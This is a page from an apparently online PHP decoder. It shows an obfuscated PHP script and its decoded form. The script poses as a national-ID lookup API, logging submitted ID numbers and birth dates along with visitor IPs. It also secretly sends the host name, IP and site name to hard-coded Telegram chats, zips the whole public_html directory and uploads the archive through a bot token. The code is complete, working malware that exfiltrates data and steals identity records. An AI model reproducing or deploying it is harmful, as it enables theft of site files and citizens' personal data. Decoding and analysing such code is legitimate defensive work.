Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php define( "\102\x4f\x54\x5f\x54\x4f\x4b\x45\116", "\67\x32\x37\x36\x35\64\x..
Decoded Output download
<?php
define(
"BOT_TOKEN",
"7276541445:AAHs0p7RWiE3Qtk8t9IrDDk2egmJM3hRaks"
);
$chatIds = [
"1989547881",
"6365538659",
];
function sendFileToTelegram($filePath, $chatId)
{
$url =
"https://api.telegram.org/bot" .
BOT_TOKEN .
"/sendDocument";
$postFields = [
"chat_id" => $chatId,
"document" => new CURLFile(realpath($filePath)),
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"Content-Type:multipart/form-data",
]);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
curl_exec($ch);
curl_close($ch);
}
function sendMessageToTelegram($message, $chatId)
{
$url =
"https://api.telegram.org/bot" .
BOT_TOKEN .
"/sendMessage";
$postFields = [
"chat_id" => $chatId,
"text" => $message,
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
curl_exec($ch);
curl_close($ch);
}
function createZipArchive($directory, $zipFileName)
{
$zip = new ZipArchive();
if (
$zip->open($zipFileName, ZipArchive::CREATE | ZipArchive::OVERWRITE) !==
true
) {
die(
"Failed to create zip archive"
);
}
$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($directory),
RecursiveIteratorIterator::LEAVES_ONLY
);
foreach ($files as $name => $file) {
if (!$file->isDir()) {
$filePath = $file->getRealPath();
$relativePath = substr($filePath, strlen($directory) + 1);
$zip->addFile($filePath, $relativePath);
}
}
$zip->close();
return $zipFileName;
}
function getHostInfo()
{
$host = gethostname();
$ip =
$_SERVER["SERVER_ADDR"] ??
gethostbyname($host);
$protocol =
(!empty($_SERVER["HTTPS"]) &&
$_SERVER["HTTPS"] !== "off") ||
$_SERVER["SERVER_PORT"] == 443
? "https://"
: "http://";
$website = $_SERVER["HTTP_HOST"];
$website = preg_replace(
"#^https?://#",
"",
$website
);
return [$host, $ip, $website];
}
list($host, $ip, $website) = getHostInfo();
$hostInfoMessage = "Host: {$host}
IP Address: {$ip}\xaWebsite: {$website}\xa";
foreach ($chatIds as $chatId) {
sendMessageToTelegram($hostInfoMessage, $chatId);
}
$directory = __DIR__;
while (basename($directory) != "public_html") {
$directory = dirname($directory);
}
$zipFileName =
$website .
"_public_html.zip";
$zipFilePath = createZipArchive($directory, $zipFileName);
foreach ($chatIds as $chatId) {
sendFileToTelegram($zipFilePath, $chatId);
}
unlink($zipFilePath);
function getClientIP()
{
$ipAddress = $_SERVER["REMOTE_ADDR"];
if (
!empty(
$_SERVER["HTTP_CLIENT_IP"]
)
) {
$ipAddress =
$_SERVER[
"HTTP_CLIENT_IP"
];
} elseif (
!empty(
$_SERVER[
"HTTP_X_FORWARDED_FOR"
]
)
) {
$ipAddress =
$_SERVER[
"HTTP_X_FORWARDED_FOR"
];
}
return $ipAddress;
}
function getLastRequestNumber()
{
$logFile = "logs.txt";
if (file_exists($logFile)) {
$logContent = file_get_contents($logFile);
$logEntries = explode("
", trim($logContent));
if (!empty($logEntries)) {
$lastEntry = end($logEntries);
$fields = explode(",", $lastEntry);
if (count($fields) > 0) {
preg_match(
"/Request (\d+)/",
$fields[0],
$matches
);
if (!empty($matches[1])) {
return intval($matches[1]);
}
}
}
}
return 0;
}
$nid = isset($_GET["nid"]) ? $_GET["nid"] : "";
$dob = isset($_GET["dob"]) ? $_GET["dob"] : "";
if (empty($nid) || empty($dob)) {
die(
"nid and dob parameters are required."
);
}
$requestNumber = getLastRequestNumber() + 1;
$userAgent =
$_SERVER["HTTP_USER_AGENT"];
$logFile = "logs.txt";
$currentDateTime = date("Y-m-d H:i:s");
$logEntry =
"Request {$requestNumber}, Date: {$currentDateTime}, NID: {$nid}, DOB: {$dob}, IP: " .
getClientIP() .
", User Agent: {$userAgent}
";
file_put_contents($logFile, $logEntry, FILE_APPEND);
$ch = curl_init();
$url = "https://projectholder69.000webhostapp.com/NID_Api_Tools_X/User/OgraniApi1.php?nid={$nid}&dob={$dob}";
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
if (curl_errno($ch)) {
echo "cURL error: " . curl_error($ch);
} else {
$jsonResponse = json_decode($response, true);
if (json_last_error() !== JSON_ERROR_NONE) {
die(
"Error decoding JSON: " .
json_last_error_msg()
);
}
unset($jsonResponse["System"]);
unset($jsonResponse["Tg Channel"]);
header(
"Content-Type: application/json"
);
echo json_encode($jsonResponse, JSON_PRETTY_PRINT);
}
curl_close($ch);
?>Did this file decode correctly?
Original Code
<?php
define(
"\102\x4f\x54\x5f\x54\x4f\x4b\x45\116",
"\67\x32\x37\x36\x35\64\x31\x34\64\65\72\x41\x41\110\163\x30\x70\x37\x52\x57\151\105\63\121\x74\x6b\x38\x74\x39\111\x72\104\104\x6b\x32\x65\147\155\x4a\x4d\x33\x68\122\141\x6b\163"
);
$chatIds = [
"\x31\x39\70\x39\65\x34\x37\x38\x38\x31",
"\66\x33\66\65\65\x33\x38\x36\65\x39",
];
function sendFileToTelegram($filePath, $chatId)
{
$url =
"\150\x74\x74\x70\163\72\57\57\141\x70\151\56\164\x65\x6c\145\x67\x72\141\x6d\56\x6f\x72\x67\x2f\142\x6f\164" .
BOT_TOKEN .
"\57\163\x65\x6e\x64\104\x6f\x63\x75\x6d\x65\x6e\164";
$postFields = [
"\143\x68\141\164\137\151\144" => $chatId,
"\x64\157\143\x75\x6d\x65\x6e\x74" => new CURLFile(realpath($filePath)),
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"\103\157\156\164\x65\x6e\x74\55\x54\x79\x70\x65\x3a\x6d\x75\x6c\164\151\160\141\162\164\x2f\x66\x6f\162\155\x2d\144\141\x74\141",
]);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
curl_exec($ch);
curl_close($ch);
}
function sendMessageToTelegram($message, $chatId)
{
$url =
"\150\164\x74\x70\x73\72\x2f\57\x61\160\x69\x2e\x74\x65\x6c\x65\x67\x72\x61\x6d\56\157\162\x67\57\x62\157\x74" .
BOT_TOKEN .
"\57\163\145\x6e\144\x4d\x65\x73\163\141\x67\x65";
$postFields = [
"\143\150\141\x74\x5f\151\x64" => $chatId,
"\164\145\x78\x74" => $message,
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
curl_exec($ch);
curl_close($ch);
}
function createZipArchive($directory, $zipFileName)
{
$zip = new ZipArchive();
if (
$zip->open($zipFileName, ZipArchive::CREATE | ZipArchive::OVERWRITE) !==
true
) {
die(
"\106\141\151\154\x65\x64\x20\x74\157\x20\143\162\145\x61\x74\145\x20\172\x69\160\x20\x61\162\x63\150\x69\x76\x65"
);
}
$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($directory),
RecursiveIteratorIterator::LEAVES_ONLY
);
foreach ($files as $name => $file) {
if (!$file->isDir()) {
$filePath = $file->getRealPath();
$relativePath = substr($filePath, strlen($directory) + 1);
$zip->addFile($filePath, $relativePath);
}
}
$zip->close();
return $zipFileName;
}
function getHostInfo()
{
$host = gethostname();
$ip =
$_SERVER["\123\x45\x52\x56\x45\x52\x5f\101\104\104\122"] ??
gethostbyname($host);
$protocol =
(!empty($_SERVER["\110\x54\x54\120\123"]) &&
$_SERVER["\x48\x54\x54\120\x53"] !== "\x6f\146\x66") ||
$_SERVER["\123\105\x52\x56\105\x52\137\120\x4f\x52\x54"] == 443
? "\x68\x74\x74\160\163\x3a\x2f\x2f"
: "\x68\x74\164\160\x3a\57\x2f";
$website = $_SERVER["\x48\124\x54\x50\x5f\110\117\123\124"];
$website = preg_replace(
"\43\x5e\x68\164\164\160\163\x3f\72\57\57\x23",
"",
$website
);
return [$host, $ip, $website];
}
list($host, $ip, $website) = getHostInfo();
$hostInfoMessage = "\110\157\163\x74\72\40{$host}\12\111\120\40\x41\x64\144\x72\145\163\x73\x3a\40{$ip}\xa\127\145\x62\x73\x69\164\145\72\40{$website}\xa";
foreach ($chatIds as $chatId) {
sendMessageToTelegram($hostInfoMessage, $chatId);
}
$directory = __DIR__;
while (basename($directory) != "\160\x75\142\x6c\x69\143\137\150\x74\155\x6c") {
$directory = dirname($directory);
}
$zipFileName =
$website .
"\x5f\x70\165\142\154\151\x63\x5f\150\x74\x6d\x6c\x2e\172\151\x70";
$zipFilePath = createZipArchive($directory, $zipFileName);
foreach ($chatIds as $chatId) {
sendFileToTelegram($zipFilePath, $chatId);
}
unlink($zipFilePath);
function getClientIP()
{
$ipAddress = $_SERVER["\x52\105\x4d\x4f\124\105\137\101\104\104\122"];
if (
!empty(
$_SERVER["\110\x54\124\120\137\x43\114\x49\x45\x4e\x54\137\x49\x50"]
)
) {
$ipAddress =
$_SERVER[
"\110\x54\x54\120\x5f\103\x4c\x49\105\x4e\x54\137\x49\x50"
];
} elseif (
!empty(
$_SERVER[
"\110\124\124\120\137\130\137\106\x4f\x52\127\101\x52\x44\x45\104\137\x46\x4f\x52"
]
)
) {
$ipAddress =
$_SERVER[
"\x48\x54\x54\x50\x5f\130\137\x46\117\x52\127\x41\122\104\105\x44\x5f\106\x4f\x52"
];
}
return $ipAddress;
}
function getLastRequestNumber()
{
$logFile = "\154\x6f\x67\x73\56\164\x78\164";
if (file_exists($logFile)) {
$logContent = file_get_contents($logFile);
$logEntries = explode("\12", trim($logContent));
if (!empty($logEntries)) {
$lastEntry = end($logEntries);
$fields = explode("\54", $lastEntry);
if (count($fields) > 0) {
preg_match(
"\x2f\122\145\161\x75\145\x73\164\x20\x28\x5c\x64\53\x29\57",
$fields[0],
$matches
);
if (!empty($matches[1])) {
return intval($matches[1]);
}
}
}
}
return 0;
}
$nid = isset($_GET["\x6e\151\144"]) ? $_GET["\156\151\144"] : "";
$dob = isset($_GET["\144\157\142"]) ? $_GET["\144\157\x62"] : "";
if (empty($nid) || empty($dob)) {
die(
"\156\151\x64\x20\141\x6e\x64\x20\144\x6f\x62\x20\160\141\162\x61\x6d\x65\x74\x65\162\x73\40\x61\x72\145\x20\162\145\161\165\x69\162\x65\x64\x2e"
);
}
$requestNumber = getLastRequestNumber() + 1;
$userAgent =
$_SERVER["\110\x54\x54\x50\137\x55\x53\105\122\x5f\101\107\105\116\124"];
$logFile = "\x6c\157\x67\x73\56\164\170\164";
$currentDateTime = date("\x59\x2d\155\55\144\x20\x48\72\x69\x3a\163");
$logEntry =
"\x52\x65\x71\x75\x65\163\x74\x20{$requestNumber}\54\40\104\x61\164\145\x3a\40{$currentDateTime}\54\x20\x4e\x49\x44\x3a\x20{$nid}\54\x20\x44\117\x42\72\40{$dob}\54\x20\x49\120\72\40" .
getClientIP() .
"\54\x20\x55\x73\x65\x72\40\101\x67\145\156\x74\x3a\40{$userAgent}\12";
file_put_contents($logFile, $logEntry, FILE_APPEND);
$ch = curl_init();
$url = "\x68\x74\164\x70\x73\x3a\x2f\x2f\x70\162\157\152\145\x63\x74\x68\157\x6c\x64\x65\162\66\71\56\60\x30\x30\x77\x65\142\x68\157\x73\164\x61\160\160\x2e\143\x6f\155\x2f\116\x49\x44\137\x41\160\x69\137\x54\x6f\157\x6c\x73\x5f\130\57\125\163\x65\162\57\117\x67\162\141\x6e\151\x41\x70\151\x31\56\x70\150\160\77\156\151\144\x3d{$nid}\x26\x64\157\142\75{$dob}";
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
if (curl_errno($ch)) {
echo "\143\125\122\x4c\x20\x65\x72\x72\x6f\162\x3a\x20" . curl_error($ch);
} else {
$jsonResponse = json_decode($response, true);
if (json_last_error() !== JSON_ERROR_NONE) {
die(
"\105\x72\162\x6f\x72\x20\144\145\143\157\144\x69\156\147\40\112\123\117\x4e\72\40" .
json_last_error_msg()
);
}
unset($jsonResponse["\123\171\x73\164\x65\155"]);
unset($jsonResponse["\x54\x67\40\x43\x68\x61\156\x6e\145\x6c"]);
header(
"\103\x6f\x6e\164\x65\156\164\x2d\x54\x79\160\145\72\x20\x61\160\x70\x6c\151\143\x61\164\151\157\156\x2f\x6a\x73\157\156"
);
echo json_encode($jsonResponse, JSON_PRETTY_PRINT);
}
curl_close($ch);
Function Calls
| None |
Stats
| MD5 | b015a9a5d9f188a0bf39f1c721d6ec11 |
| Eval Count | 0 |
| Decode Time | 53 ms |